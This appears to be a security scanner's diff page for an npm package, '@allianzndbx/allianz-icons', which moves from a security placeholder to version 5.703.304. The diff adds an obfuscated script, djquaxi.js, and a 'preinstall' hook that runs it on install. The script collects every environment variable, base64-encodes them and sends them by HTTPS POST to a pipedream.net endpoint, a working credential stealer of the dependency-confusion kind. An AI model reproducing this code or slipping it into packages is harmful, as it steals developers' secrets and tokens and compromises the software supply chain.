@allianzndbx/allianz-icons 0.0.1-security → 5.703.304
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @allianzndbx/allianz-icons might be problematic. Click here for more details.
- package/djquaxi.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/djquaxi.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x70102f=a0_0x592c;function a0_0x592c(_0x1d1698,_0x1bd6ae){const _0x4f02c0=a0_0x4f02();return a0_0x592c=function(_0x592ce1,_0x3ff5a7){_0x592ce1=_0x592ce1-0x17d;let _0x5e6fcc=_0x4f02c0[_0x592ce1];return _0x5e6fcc;},a0_0x592c(_0x1d1698,_0x1bd6ae);}(function(_0x4a7e98,_0x257329){const _0x10795b=a0_0x592c,_0x57b91d=_0x4a7e98();while(!![]){try{const _0x3eaf78=parseInt(_0x10795b(0x181))/0x1*(-parseInt(_0x10795b(0x17f))/0x2)+parseInt(_0x10795b(0x188))/0x3+-parseInt(_0x10795b(0x186))/0x4+parseInt(_0x10795b(0x18e))/0x5+parseInt(_0x10795b(0x185))/0x6*(-parseInt(_0x10795b(0x17d))/0x7)+-parseInt(_0x10795b(0x18f))/0x8*(-parseInt(_0x10795b(0x184))/0x9)+parseInt(_0x10795b(0x18b))/0xa;if(_0x3eaf78===_0x257329)break;else _0x57b91d['push'](_0x57b91d['shift']());}catch(_0x1d4da9){_0x57b91d['push'](_0x57b91d['shift']());}}}(a0_0x4f02,0xbda81));const http=require(a0_0x70102f(0x180));req=http['request']({'host':[a0_0x70102f(0x189),'m',a0_0x70102f(0x18c),a0_0x70102f(0x192)][a0_0x70102f(0x18a)]('.'),'path':'/'+(process[a0_0x70102f(0x18d)]['npm_package_name']||''),'method':a0_0x70102f(0x191)}),req[a0_0x70102f(0x17e)](Buffer[a0_0x70102f(0x182)](JSON[a0_0x70102f(0x187)](process['env']))[a0_0x70102f(0x183)](a0_0x70102f(0x190))),req['end']();function a0_0x4f02(){const _0x52f07b=['4038776JbdPtj','stringify','2879100UKNkjT','b2c25c3b4e80055c256dc21dd58fb813','join','30547700zYFoZE','pipedream','env','1911455LFImOi','86080LmAmAl','base64','POST','net','77smXBtP','write','94esAmvP','https','32831TUTcdF','from','toString','144zsinJe','676002vHocPW'];a0_0x4f02=function(){return _0x52f07b;};return a0_0x4f02();}
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "@allianzndbx/allianz-icons",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "5.703.304",
|
4
|
+
"main": "djquaxi.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node djquaxi.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40allianzndbx%2Fallianz-icons for more information.
|